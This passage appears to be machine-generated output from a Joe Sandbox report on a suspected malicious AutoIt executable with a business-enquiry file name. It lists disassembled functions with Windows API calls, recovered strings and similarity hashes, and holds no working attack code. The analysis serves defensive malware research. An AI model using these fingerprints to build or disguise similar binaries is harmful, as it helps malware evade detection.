                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: Combobox
                                • API String ID: 3850602802-2096851135
                                • Opcode ID: 823362925140d07dceae5a62cb510ff488666e57b7259ca6a12de47688d6769e
                                • Instruction ID: a649e863623068fc27f2f2fef5db9520e75d9443df0b04fa3d6d3afde05403a5
                                • Opcode Fuzzy Hash: 823362925140d07dceae5a62cb510ff488666e57b7259ca6a12de47688d6769e
                                • Instruction Fuzzy Hash: 6011B271300209BFEF218F54DCC5FEB376AEB893A4F104128F96997290D631DD519BA0
                                Function 00CC970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                  • Part of subcall function 00C7C619: GetStockObject.GDI32(00000011), ref: 00C7C66B
                                  • Part of subcall function 00C7C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                • GetWindowRect.USER32(00000000,?), ref: 00CC9775
                                • GetSysColor.USER32(00000012), ref: 00CC978F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                • String ID: static
                                • API String ID: 1983116058-2160076837
                                • Opcode ID: e67945877656ab17674a47ebef915bad789763ddb79732319fd046f715cb3f4e
                                • Instruction ID: 1b85ac3df89dca71dbd6361221975d3c2a2628f453b7dba15da4899d2f06c00f
                                • Opcode Fuzzy Hash: e67945877656ab17674a47ebef915bad789763ddb79732319fd046f715cb3f4e
                                • Instruction Fuzzy Hash: 5D113776520209AFDB04DFB8DC89EEE7BB8EB08354F005529F956E3241E735E851DB60
                                Function 00CC9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowTextLengthW.USER32(00000000), ref: 00CC94A6
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CC94B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LengthMessageSendTextWindow
                                • String ID: edit
                                • API String ID: 2978978980-2167791130
                                • Opcode ID: 5abb3dea1492e120ee73f3f1f034232ba6a3c050252593f2afd5ebde6eb8ca4f
                                • Instruction ID: 06cc20bbb1c50058bb5a61bdb418ba1dd660e11163db5cec9f566ec80d1b5c18
                                • Opcode Fuzzy Hash: 5abb3dea1492e120ee73f3f1f034232ba6a3c050252593f2afd5ebde6eb8ca4f
                                • Instruction Fuzzy Hash: 4C113D71500208AFEB148EA4DC89FBB376AEB15374F504728F975971D0C675DC52AB60
                                Function 00CA5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CA5CF3
                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CA5D12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoItemMenu_memset
                                • String ID: 0
                                • API String ID: 2223754486-4108050209
                                • Opcode ID: 2cc0f0f174cb6119173cac728ad98fabd9da42e1058fbe4f4f0c4fd6dcde4572
                                • Instruction ID: 55a73893fc3b2f12ac1554f4da0db046b2ccb24feda3d09e13dd93da254a1964
                                • Opcode Fuzzy Hash: 2cc0f0f174cb6119173cac728ad98fabd9da42e1058fbe4f4f0c4fd6dcde4572
                                • Instruction Fuzzy Hash: 8511B672D0162AABDB20DB58DD48B9D7BF99B1B35CF188011ED51EB290D3709E05C791
                                Function 00CB53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CB544C
                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CB5475
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Internet$OpenOption
                                • String ID: <local>
                                • API String ID: 942729171-4266983199
                                • Opcode ID: a1b2a20ad3828f58ff9bbf29aad8b9b670bc731238e331427f65d9ff7a50b045
                                • Instruction ID: faee1b9374f5f11b49a78f43deb4a24cc2532b8750f6066607656a766d5db1e2
                                • Opcode Fuzzy Hash: a1b2a20ad3828f58ff9bbf29aad8b9b670bc731238e331427f65d9ff7a50b045
                                • Instruction Fuzzy Hash: FF119E70141A21BADB258F529885FEBBAA8EF12752F10822AF65557040E6B06AC0DAB0
                                Function 00CBACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CBACF5
                                • htons.WSOCK32(00000000,?,00000000), ref: 00CBAD32
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: htonsinet_addr
                                • String ID: 255.255.255.255
                                • API String ID: 3832099526-2422070025
                                • Opcode ID: c21e8329345714f82e4794de92a30c845f3f62af99051f46f20ebcee50784a0f
                                • Instruction ID: 9f1340b4cd031b061eb39a9e0572451c8aabd52b8b3e8cc7b5f31334daf82210
                                • Opcode Fuzzy Hash: c21e8329345714f82e4794de92a30c845f3f62af99051f46f20ebcee50784a0f
                                • Instruction Fuzzy Hash: 1001D235200305ABCB109FB4D886FEEB364EF09724F20851AF9169B2D1DA71E910C755
                                Function 00C9C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C9C5E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1456604079-1403004172
                                • Opcode ID: 6ea0147e4a73ed97557002e0a514531e6225e59a3369b1622ca3d19846d73994
                                • Instruction ID: 4e988e983951537b2a5b1abbafc66ed195fcbcb1e457ecd08cfbff386b3caf45
                                • Opcode Fuzzy Hash: 6ea0147e4a73ed97557002e0a514531e6225e59a3369b1622ca3d19846d73994
                                • Instruction Fuzzy Hash: 5001B171641218ABCB18FBA4CCD69FE73A9AF4A310B140A19F473A72D1DE316909B750
                                Function 00CAC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __fread_nolock_memmove
                                • String ID: EA06
                                • API String ID: 1988441806-3962188686
                                • Opcode ID: 8c4e2de651daab61eb21cbb980abdebfdc1aab0f17370b52c43b6b07ba905850
                                • Instruction ID: 19539f868276af19d58f4449bee97c5464f72945ff90c2b1e2ed83a975bb5f25
                                • Opcode Fuzzy Hash: 8c4e2de651daab61eb21cbb980abdebfdc1aab0f17370b52c43b6b07ba905850
                                • Instruction Fuzzy Hash: EA01F5729002187EDB28D7A8C856EFE7BF89B05715F00416AF193D2181E4B4A7089B60
                                Function 00C9C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C9C4E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1456604079-1403004172
                                • Opcode ID: 2d4812c0698edc8dfb7c2abe033927fac09016e412f405ed1b923043334cc07c
                                • Instruction ID: 8403de2171e2bdacb671e8f60637666033eb42dfc6daca3151fdd63a9db32b5a
                                • Opcode Fuzzy Hash: 2d4812c0698edc8dfb7c2abe033927fac09016e412f405ed1b923043334cc07c
                                • Instruction Fuzzy Hash: 0B018B71641108BBCB14EBA4C9E6AFF73A89F19300F240129B543E32D2EA549E09A6A1
                                Function 00C634F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00C6352A
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • _wcscat.LIBCMT ref: 00CD66C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FullNamePath_memmove_wcscat
                                • String ID: `T
                                • API String ID: 257928180-1867313790
                                • Opcode ID: 983a32298ce583804c223c41551d336e6223916852f330d1e5ec13b4550de60a
                                • Instruction ID: fafdc708aa2e04ee99bf3afa9601fd9824b44a69c8064c6f974f94e4104066bb
                                • Opcode Fuzzy Hash: 983a32298ce583804c223c41551d336e6223916852f330d1e5ec13b4550de60a
                                • Instruction Fuzzy Hash: A601C47590411C9ACB20FBA0D8C5ADD73F9AF24348F0045A5AA16D3190EA309B869B61
                                Function 00C9C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C9C562
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1456604079-1403004172
                                • Opcode ID: 609f1206de2eea3843351341732c67170c3e5415d1ba4edfac0dadba316af524
                                • Instruction ID: f5d345c3fa519180c9619a8c022dd74825f3001fd0369188fe4c07ad6158a80b
                                • Opcode Fuzzy Hash: 609f1206de2eea3843351341732c67170c3e5415d1ba4edfac0dadba316af524
                                • Instruction Fuzzy Hash: 3801AD71A41108BBCB14FBA4C9D6EFF73AC9F19701F240115B403E3192DA65AF09B2B1
                                Function 00CA804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClassName_wcscmp
                                • String ID: #32770
                                • API String ID: 2292705959-463685578
                                • Opcode ID: 96803afa67d3e44b52589df180bf0d7d9c76e8dd48c569cf0051441deb7d5a9a
                                • Instruction ID: 09ec8a87f3d63e2e9a14b440c186194685759e36da943520da87e58e82a5940c
                                • Opcode Fuzzy Hash: 96803afa67d3e44b52589df180bf0d7d9c76e8dd48c569cf0051441deb7d5a9a
                                • Instruction Fuzzy Hash: CEE0D83360032967D720EBA6AC4AFDBFBACEB51764F000026F924E3141DA70A64587E4
                                Function 00C9B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                Download Yara Rule
                                APIs
                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C9B36B
                                  • Part of subcall function 00C82011: _doexit.LIBCMT ref: 00C8201B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Message_doexit
                                • String ID: AutoIt$Error allocating memory.
                                • API String ID: 1993061046-4017498283
                                • Opcode ID: 6ede149d211ec456cc6d53f85588ca1b75c9ed5e471aef216b7d1d5e44a3ff45
                                • Instruction ID: 3a3f337d3cec810506da803ec7d53f2727f1434a9a62b295e26f3620d2e7ae2e
                                • Opcode Fuzzy Hash: 6ede149d211ec456cc6d53f85588ca1b75c9ed5e471aef216b7d1d5e44a3ff45
                                • Instruction Fuzzy Hash: CED05B3138835833D65536987C4FFD9768C4F05B56F100415BF09591D28ED295D062ED
                                Function 00CDBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?), ref: 00CDBAB8
                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00CDBCAB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: DirectoryFreeLibrarySystem
                                • String ID: WIN_XPe
                                • API String ID: 510247158-3257408948
                                • Opcode ID: 0a2abe56d99ae73343c049e3858492614093345afbca244c320562a89327ee24
                                • Instruction ID: 98dc5b54db48192c4315328622fe6f3ecbe48d8a1e05db49d4d3da59d294783c
                                • Opcode Fuzzy Hash: 0a2abe56d99ae73343c049e3858492614093345afbca244c320562a89327ee24
                                • Instruction Fuzzy Hash: 4AE0C970C0414DEFCB15DBA9C885AEDB7B8BB08300F558486E626B6250C7719E45EF25
                                Function 00CC84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                Download Yara Rule
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC84DF
                                • PostMessageW.USER32(00000000), ref: 00CC84E6
                                  • Part of subcall function 00CA8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA83CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 9467b231fa0971c5eb1f0e9261665608fe2b99bd59170e76ac6f4708d95a7390
                                • Instruction ID: fceedbcc39ffbab10489d55c7001f25bf846bd9a8cd8e328a6c7727b86906b7e
                                • Opcode Fuzzy Hash: 9467b231fa0971c5eb1f0e9261665608fe2b99bd59170e76ac6f4708d95a7390
                                • Instruction Fuzzy Hash: FCD012723853547FEB65A770AC8FFDB6658AB19B51F040D29B34BAE1D0CDE0B804C664
                                Function 00CC8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                Download Yara Rule
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC849F
                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CC84B2
                                  • Part of subcall function 00CA8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA83CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: e5fefb8d22b68abb5616fa89a5ac19b5d4ca8b81d164232f0c75e1b7e2387ac0
                                • Instruction ID: c90f78e91d06a4f629e94ecf96d3033ef154742e9e253effd4b435068f52a4b7
                                • Opcode Fuzzy Hash: e5fefb8d22b68abb5616fa89a5ac19b5d4ca8b81d164232f0c75e1b7e2387ac0
                                • Instruction Fuzzy Hash: F7D01272385354BFEB64A770AC8FFDB6A58AB14B51F040D29B34BAE1D0CDE0B804C660